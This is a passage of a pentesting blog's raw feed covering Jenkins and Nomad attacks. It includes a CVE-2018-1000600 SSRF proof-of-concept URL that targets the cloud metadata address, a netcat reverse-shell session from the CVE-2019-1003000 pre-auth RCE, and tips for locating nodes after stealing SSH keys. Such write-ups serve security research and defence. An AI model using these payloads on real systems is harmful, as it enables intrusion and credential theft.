style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"517\" data-original-width=\"1600\" height=\"128\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgGcpIVEPCahotTk1ZYDNLcPI1gxdOD2jjrjTD9qSd_4bGE4Z29llePq3R0qj_VfAdixes_4NrHNIktGdBqLzEr7SRrPudfMT02usJ4DMltSbMdwu5fa3OWHMcd16Y6_eBE0GIU7NN5lxQ\/s400\/Screen+Shot+2018-12-18+at+11.24.30+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" 
style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiza2dVv-hNAWpTeFCsysIeNHkSGnqjc57K_a7cNAN4tzs9CuC6Qv80DEpXXjX72NRXdr9JN82olebdExMZnMXn76riN5rc1gv4R9u3NALJZNMoTvwCSEFF2Graub0e56_KdT2W84YYaFs\/s1600\/Screen+Shot+2018-12-18+at+11.31.58+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"78\" data-original-width=\"1358\" height=\"36\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiza2dVv-hNAWpTeFCsysIeNHkSGnqjc57K_a7cNAN4tzs9CuC6Qv80DEpXXjX72NRXdr9JN82olebdExMZnMXn76riN5rc1gv4R9u3NALJZNMoTvwCSEFF2Graub0e56_KdT2W84YYaFs\/s640\/Screen+Shot+2018-12-18+at+11.31.58+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nforcefully run the garbage collection\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjFOlgacL3qsblM44YqxlQnz_DDMbjnR4pL24ieUKbUQTSVsSbh7w3uuikQSxwDo5VF0d2kqhIFf20cwo1mX3ZU84S9jeWa5yhj1kpRoBbPCsAUrzNeA9kDvcBWiktEt2YQkzlFkga7JVI\/s1600\/jobs-gc.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"449\" data-original-width=\"1600\" height=\"111\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjFOlgacL3qsblM44YqxlQnz_DDMbjnR4pL24ieUKbUQTSVsSbh7w3uuikQSxwDo5VF0d2kqhIFf20cwo1mX3ZU84S9jeWa5yhj1kpRoBbPCsAUrzNeA9kDvcBWiktEt2YQkzlFkga7JVI\/s400\/jobs-gc.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nvalidation the job was deleted\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv 
class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nOK let's get a reverse shell. I used the following hcl file:\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/4a436a8dc0dcb142a8c836e48916dd71\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/4a436a8dc0dcb142a8c836e48916dd71\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiIxyOpUjaCcIBoC-8xsjCexQp3oU02WRDD8flfVpDpLR9HV5Hej75FG8INf81-qfu1A60pooioeS53lXp4I8KH-vyr5bjKVNwyIpaMJ6fAMDlwxuavGkmmAYMhmnSiWuupytGWvwKC7us\/s1600\/Screen+Shot+2018-12-18+at+11.37.24+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"188\" data-original-width=\"1600\" height=\"74\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiIxyOpUjaCcIBoC-8xsjCexQp3oU02WRDD8flfVpDpLR9HV5Hej75FG8INf81-qfu1A60pooioeS53lXp4I8KH-vyr5bjKVNwyIpaMJ6fAMDlwxuavGkmmAYMhmnSiWuupytGWvwKC7us\/s640\/Screen+Shot+2018-12-18+at+11.37.24+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\nReverse shell job\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmN0UPapQTUMZZ1C1GTVzX7TOjB9kb0ytM5wk2lfP-sa4AoCtAlQXXZ6vcdRLvm4HiUEXI1GV27O6oTICDdDgAPzrZS4IYSWxoEBemfGdK4014yBRy_7QC49fRkCRCaE3V7_pcoNATjl4\/s1600\/Screen+Shot+2018-12-18+at+11.37.11+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg 
border=\"0\" data-original-height=\"541\" data-original-width=\"1600\" height=\"216\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmN0UPapQTUMZZ1C1GTVzX7TOjB9kb0ytM5wk2lfP-sa4AoCtAlQXXZ6vcdRLvm4HiUEXI1GV27O6oTICDdDgAPzrZS4IYSWxoEBemfGdK4014yBRy_7QC49fRkCRCaE3V7_pcoNATjl4\/s640\/Screen+Shot+2018-12-18+at+11.37.11+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nShell from nomad\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv style=\"text-align: left;\"\u003E\n-CG\u003C\/div\u003E\n\u003Cbr \/\u003E\nInfo on locking nomad down via ACLs:\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.nomadproject.io\/guides\/security\/acl.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/guides\/security\/acl.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/1555777666843031796\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/1555777666843031796","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1555777666843031796"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1555777666843031796"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/12\/devoops-nomad-with-rawexec-enabled.html","title":"Devoops: Nomad with raw_exec 
enabled"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY\/s72-c\/Screen+Shot+2018-12-18+at+10.57.58+AM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-2715327188736957907"},"published":{"$t":"2019-03-05T14:01:00.003-05:00"},"updated":{"$t":"2019-03-05T14:01:41.948-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - CVE-2018-1000600 PoC"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003Esecond exploit from the blog post\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Ca href=\"https:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003EChained with CVE-2018-1000600 to a Pre-auth Fully-responded 
SSRF\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/jenkins.io\/security\/advisory\/2018-06-25\/#SECURITY-915\"\u003Ehttps:\/\/jenkins.io\/security\/advisory\/2018-06-25\/#SECURITY-915\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003EThis affects the GitHub\u0026nbsp;plugin that is installed by default. However, I learned that when you spin up a new Jenkins instance it pulls all the updated plugins (also by default). I'm honestly not sure how often people have plugins set to update to the latest version by default, but it does seem to knock down some of this stuff.\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003Eexploit works against:\u0026nbsp;\u003C\/span\u003EGitHub Plugin up to and including 1.29.1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EWhen I installed Jenkins today (25 Feb 19) it installed 1.29.4 by default, so the PoC below does NOT work against it.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EFrom the blog post:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: #f8f8f8; font-family: \u0026quot;ubuntu\u0026quot;; 
font-size: 13.2px;\"\u003ECSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials\u003C\/span\u003E\u0026nbsp;\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #444444; font-family: \u0026quot;ubuntu\u0026quot;; font-size: 13.2px;\"\u003EIt can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #444444; font-family: \u0026quot;ubuntu\u0026quot;; font-size: 13.2px;\"\u003EAlthough it can’t extract any credentials without known credentials ID, there is still another attack primitive - a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cdiv style=\"background-color: white; box-sizing: border-box; font-family: \u0026quot;ubuntu\u0026quot;; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPoC:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cpre style=\"background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-family: \u0026quot;source code pro\u0026quot;, monospace; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;\"\u003E\u003Ccode style=\"background-color: transparent; border-radius: 0px; box-sizing: border-box; font-family: \u0026quot;source code pro\u0026quot;, monospace; font-size: inherit; padding: 0px;\"\u003E\u003Cspan style=\"color: 
#444444;\"\u003Ehttp:\/\/jenkins.local\/securityRealm\/user\/admin\/descriptorByName\/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator\/createTokenByPassword\n?apiUrl=http:\/\/169.254.169.254\/%23\n\u0026amp;login=orange\n\u0026amp;password=tsai\u003C\/span\u003E\u003C\/code\u003E\u003C\/pre\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cspan style=\"background-color: white;\"\u003ETo get old versions of the plugin and info you can go to\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u0026nbsp;\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/wiki.jenkins.io\/display\/JENKINS\/GitHub+Branch+Source+Plugin\" target=\"_blank\"\u003Ehttps:\/\/wiki.jenkins.io\/display\/JENKINS\/GitHub+Branch+Source+Plugin\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003Edownload old versions\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/updates.jenkins.io\/download\/plugins\/github-branch-source\/\" 
target=\"_blank\"\u003Ehttps:\/\/updates.jenkins.io\/download\/plugins\/github-branch-source\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/updates.jenkins.io\/download\/plugins\/github\/\" target=\"_blank\"\u003Ehttps:\/\/updates.jenkins.io\/download\/plugins\/github\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/2715327188736957907\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/2715327188736957907","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2715327188736957907"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2715327188736957907"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-cve-2018-1000600-poc.html","title":"Jenkins - CVE-2018-1000600 PoC"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-6814904859046744361"},"published":{"$t":"2019-03-04T22:26:00.000-05:00"},"updated":{"$t":"2019-03-04T22:26:46.045-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - messing with exploits pt3 - 
CVE-2019-1003000"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EReferences:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Ca href=\"https:\/\/www.exploit-db.com\/exploits\/46453\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/www.exploit-db.com\/exploits\/46453\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttp:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThis post covers the Orange Tsai Jenkins pre-auth exploit\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EVuln versions: Jenkins \u0026lt; 2.137 (preauth)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPipeline: Declarative Plugin up to and including 1.3.4\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPipeline: Groovy Plugin up to and including 2.61\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EScript Security Plugin up to and including 1.49\u0026nbsp; (in CG's testing 1.50 is also vuln)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThe exploitdb link above lists a nice self contained exploit that will compile the jar for you and serve it up for retrieval by the vulnerable Jenkins server.\u003C\/span\u003E\u003Cbr 
\/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU\/s1600\/Screen+Shot+2019-03-04+at+10.10.59+PM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"409\" data-original-width=\"1600\" height=\"162\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU\/s640\/Screen+Shot+2019-03-04+at+10.10.59+PM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Enc -l 8888 -vv\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Ewhoami\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Ebash: no job control in this shell\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003E\u0026nbsp;bash-3.2$ jenkins\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr 
\/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Times, Times New Roman, serif;\"\u003EAfter Jenkins 2.138 the preauth is gone but if you have\u0026nbsp; an overall read token and the plugins are still vulnerable you can still exploit that server.\u0026nbsp; You can just add your cookie to the script and it will hit the url with your authenticated cookie and you can still exploit the server.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Times, Times New Roman, serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgTCbP9HVZm6fIKHdmevuqtwz8tLMEtjqpkT3aQ_aUdB5AHhOYjqYk1sBF37FgAa2D3E9wXJheqsyYbBmh910-8B2y3WhmaKWDVLvpjeZzWgKPCAR1ar1-8WC9zJkqY0T6TzgkOcF1uUu8\/s1600\/Screen+Shot+2019-03-04+at+10.21.38+PM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"244\" data-original-width=\"1112\" height=\"87\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgTCbP9HVZm6fIKHdmevuqtwz8tLMEtjqpkT3aQ_aUdB5AHhOYjqYk1sBF37FgAa2D3E9wXJheqsyYbBmh910-8B2y3WhmaKWDVLvpjeZzWgKPCAR1ar1-8WC9zJkqY0T6TzgkOcF1uUu8\/s400\/Screen+Shot+2019-03-04+at+10.21.38+PM.png\" width=\"400\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: Times, Times New Roman, serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/6814904859046744361\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/6814904859046744361","title":"0 
Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6814904859046744361"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6814904859046744361"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-messing-with-exploits-pt3-cve.html","title":"Jenkins - messing with exploits pt3 - CVE-2019-1003000"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU\/s72-c\/Screen+Shot+2019-03-04+at+10.10.59+PM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-8575904409576959407"},"published":{"$t":"2019-03-04T21:16:00.002-05:00"},"updated":{"$t":"2019-03-04T21:16:15.412-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - Identify IP Addresses of nodes"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EWhile doing some research I found several posts on stackoverflow asking how to identify the IP address of nodes.\u0026nbsp; You might want to know this if you read the \u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-decrypting-credentialsxml.html\" target=\"_blank\"\u003Edecrypting credentials post\u003C\/a\u003E\u0026nbsp;and 
managed to get yourself some ssh keys for nodes but you can't actually see the node's IP in the Jenkins UI.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EStackoverflow link:\u0026nbsp;\u003Ca href=\"https:\/\/stackoverflow.com\/questions\/14930329\/finding-ip-of-a-jenkins-node\" target=\"_blank\"\u003Ehttps:\/\/stackoverflow.com\/questions\/14930329\/finding-ip-of-a-jenkins-node\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003Eblog on setting up a node:\u0026nbsp;\u003Ca href=\"https:\/\/embeddedartistry.com\/blog\/2017\/12\/22\/jenkins-configuring-a-linux-slave-node\" target=\"_blank\"\u003Ehttps:\/\/embeddedartistry.com\/blog\/2017\/12\/22\/jenkins-configuring-a-linux-slave-node\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u0026nbsp;There are great answers in the stackoverflow post on using the script console but in the event you found yourself with just the Jenkins directory or no access to the script console it's pretty easy to get this information.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EYou can just browse to \u003Cspan style=\"font-family: Courier New, Courier, monospace;\"\u003Ejenkins-ip\/computer\/$nodename\/config.xml\u003C\/span\u003E.
